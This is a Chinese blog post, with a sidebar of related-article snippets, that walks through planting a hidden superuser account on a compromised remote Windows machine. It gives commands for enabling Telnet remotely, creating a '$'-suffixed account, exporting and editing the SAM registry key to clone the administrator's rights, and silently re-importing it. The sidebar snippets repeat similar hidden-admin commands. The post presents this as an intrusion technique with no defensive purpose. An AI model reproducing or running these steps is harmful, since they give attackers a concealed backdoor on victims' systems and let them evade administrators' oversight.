命令行建立隐藏超级用户

最新推荐文章于 2024-05-02 19:07:46 发布
最新推荐文章于 2024-05-02 19:07:46 发布
阅读量661 收藏
点赞数
分类专栏: win 文章标签: user shell 工具
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaoxxcool/article/details/3084786
版权


首先通过使用OpenTelnet.exe工具来开启远程主机的TELNET服务,然后TELNET远程登陆得到一个shell,创建一个新的帐户,命令为:
net user hacker$ youkou /add,然后就来导出注册表项HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users,运行命令:
regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/,其中/e 是regedit.exe的参数,在HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users这个键的一定要 以“/”结尾。





断开TELNET连接,建立IPC会话:net use //192.XX.XX.2/ipc$ "123" /user:"administrator,然后将肉鸡上的hacker.reg下载到本机上用记事本打开进行编辑命令为:copy //192.XX.XX.2/D$/hacker.reg,用记事本编辑,将超级用户对应的项000001F4下的键“F”的值复制,并覆盖 hacker$对应的项000003EE下的键“F”的值(hacker$对应的项在不同的机器而不同),编辑好后再上传:copy hacker.reg //192.XX.XX.2/D$/hacker1.reg 。

再TELNET到远程主机,使用命令net user hacker$ /del删除hacker$帐户,然后把hacker.reg导入,命令为:regedit.exe /s hacker.reg,其中参数/s表示以安静模式导入。这样就成功创建了一个隐藏的超级用户。
xiaoxxcool
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
进程隐藏工具很好啊啊
05-07
置标题 (a - 1, 2, 进程取路径及命令行参数 (进程信息 [a].进程ID)) .计次循环尾 () 标签_进程数.标题 = “进程数:” + 到文本 (进程数) .子程序 _按钮3_被单击 信息框 (“结束成功!”, #信息图标, “温馨...
如何在命令行下远程建立隐藏超级用户
蓝法典的专栏
04-10 3877
在这里将用at的命令,因为用at产生的计划任务是以系统身份运行的,所以也用不到psu.exe程序。为了能够使用at命令,肉鸡必须开 有schedule的服务,如果没有开启,可用流光里带的工具netsvc.exe或sc.exe来远程启动,当然其方法也可以,只要能启动schedule服 务就行。 对于命令行方式,你可以采用各种连接方式,如用SQLexec连接MSSQL的1433端口,也可以用telne
添加隐藏用户脚本
caiguazheng4921的博客
04-19 130
net user admins$ 1234567 /addnet localgroup administrators admins$ /addEcho HKEY_LOCAL_MACHINE\SAM [1] >>c:/tem.iniEcho HKEY_LOCAL_MACHINE\SAM\SAM [1] >>c:/tem.iniEcho HKEY_LOCA...
命令行创建windows隐藏用户
酒零
11-24 3335
windows纯命令行创建隐藏用户 总体步骤: 创建用户 导出注册表 删除用户 导入注册表 net user admin$ 123 【创建命令行隐藏用户】 net localgroup administrators admin$ /add 【加入管理员组】 reg export HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users c:\1.reg...
建立隐藏管理员用户
weixin_30632089的博客
09-28 168
1、远程命令提示符下输入命令“net user 用户名$ 密码 /add” 和 “net localgroup administrators 用户名$ /add”2、打开远程登陆工具,单击开始菜单 点击“运行” 或 windows键+R 打开运行对话框,输入“mstsc” 回车3、填上肉鸡IP 并 连接4、登陆后,运行注册表“regedit”修改SAM权限,即 找到“HKEY_LOCA...
隐藏用户建立(Powershell
weixin_33979363的博客
11-03 176
最近做测试的时候发现,windows server2012 使用Mimikatz是直接抓不到明文密码的,而且,直接创建的账号登陆有时会碰到这个问题: ps:2012抓明文需要HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest的"UseLogonCredential"设置为1,类型为DWORD 32才可以,然后下次用...
绝招:隐藏管理员账号 三分钟搞定
01-10
对regedit.exe大家都很熟悉,但却不能对注册表的...具体步聚如下: 1、假设我们是以超级用户administrator登录到开有终端服务的肉鸡上的,首先在命令行下或帐户管理器中建立一个帐户:hacker$,这里我在命令行建立这个
CommandLine-Terminal-Guide-MacAndLinux:为Mac和Linux用户编译必要的终端命令
04-19
基本的: sudo >使用管理员/超级用户安全特权运行。 man [cmd] ->显示指定命令的手册页。 pwd >显示路径。 date ->显示当前日期。 cal >显示当前月份的日历。目录管理: cd [dir] ->输入目录,对名称加空格使用撇号...
通讯调试工具,支持:串口通讯、串口代理、TCP、UDP、Telnet、Ping、TFtp等通讯测试
04-22
3、支持命令终端模式,功能类似Windows下的超级终端,可以进行复制、粘贴等操作,可以上下翻页滚动; 在终端窗口可以通过鼠标滚轮上下滚动,可以通过“Ctrl+箭头”、“Ctrl+翻页键”上下翻页操作; 4、工具支持...
cmd操作命令和linux命令大全收集
04-24
dir 查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W上次被修改时间 date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间,...
建立隐藏超级用户多种方法
12-16 918
一、如何在图形界面建立隐藏超级用户 图形界面下适用本地或开3389终端服务的肉鸡上。上面我提到的那位作者说的方法很好,但是较为复杂,还要用到psu.exe(让程序以系统用户身份运行的程序),如果在肉鸡上的话还要上传psu.exe。我说的这个方法将不用到psu.exe这个程序。因为windows2000有两个注册表编辑器:regedit.exe和regedt32.exe。XP中regedit.ex
win10黑客教学(3)--win10创建本地隐藏用户
azraelxuemo的博客
05-26 4423
本地管理账户主要通过三种方式进行用户账户查看管理 通过命令行格式直接进行查看 在命令行直接输入 net user \\DESKTOP 的用户帐户 ------------------------------------------------------------------------------- admin Administrator DefaultAccount Guest WDAGUtili
Windows批处理创建、删除隐藏账户,实现远程登录
weixin_48703780的博客
02-27 4195
WindowsXp批处理添加、删除隐藏账户 一、手动操作 新建一个用户 利用命令行直接输或者做成批处理程序具体内容如下: @echo off net user godyang$ 123456 /add net localgroup administrators godyang$ /add pause 运行结果如图: [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-I1QTpf1d-1614354398629)(RackMultipart20210226-4-1marn40_
建立超级隐藏用户账户
abcd51685168的专栏
12-10 6458
一、“命令提示符”中的阴谋   其实,制作系统隐藏账户并不是十分高深的技术,利用我们平时经常用到的“命令提示符”就可以制作一个简单的隐藏账户。 一、“命令提示符”中的阴谋   其实,制作系统隐藏账户并不是十分高深的技术,利用我们平时经常用到的“命令提示符”就可以制作一个简单的隐藏账户。   点击“开始”→“运行”,输入“CMD”运行“命令提示符”,输入“net user p
Shell技能树---字符串目录操作命令
renhl252的专栏
04-28 971
Shell技能树---字符串目录操作命令
ShellScript脚本编程(一)
最新发布
qq_65463941的博客
05-02 531
和和. hello.sh两种运行的方式差异性在于,第一种是在子bash环境下运行,而第二种是在当前bash环境下运行,我们通过运行可以看到(source 是 shell 内嵌)我们执行ps -f可以查看当前bash环境,创建一个子bash,继续通过ps -f查看,在当前子bash环境下,你依然可以运行shell文件如果子shell中设置的当前变量,父shell是可不见的age = 20全局变量和局部变量的区别全局变量:层层嵌套的子bash依然可以访问。
xs9922b_colorbar.bat
自由软件的天堂
04-28 293
通过用户空间I2C操作让XS9922B输出彩条
some 术语 1
hxp1994的专栏
05-01 359
1-3:设备上电起来后,跳转到Boot ROM(不是flash)中的boot code中执行把pre-loader加载起到ISRAM, 因为当前DRAM(RAM分SRAM跟DRAM,简单来说SRAM就是cache,DRAM就是普通内存)还没有准备好,所以要先把pre-loader load到芯片内部的ISRAM(Internal SRAM)中。user+ root 和user+非root都试用于:*#649~010# ------------6*7*76。
shell编程中$(cmd) 和 `cmd` 之间有什么区别
luoyz23的博客
04-30 348
shell编程中 $(cmd) 和 `cmd` 之间的相同与不同之处
linux命令行创建用户
03-16
在Linux命令行创建用户,可以使用以下命令: 1. useradd:创建用户 例如,要创建一个名为“test”的新用户,可以使用以下命令: ``` useradd test ``` 2. passwd:设置用户密码 创建用户后,需要设置用户...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值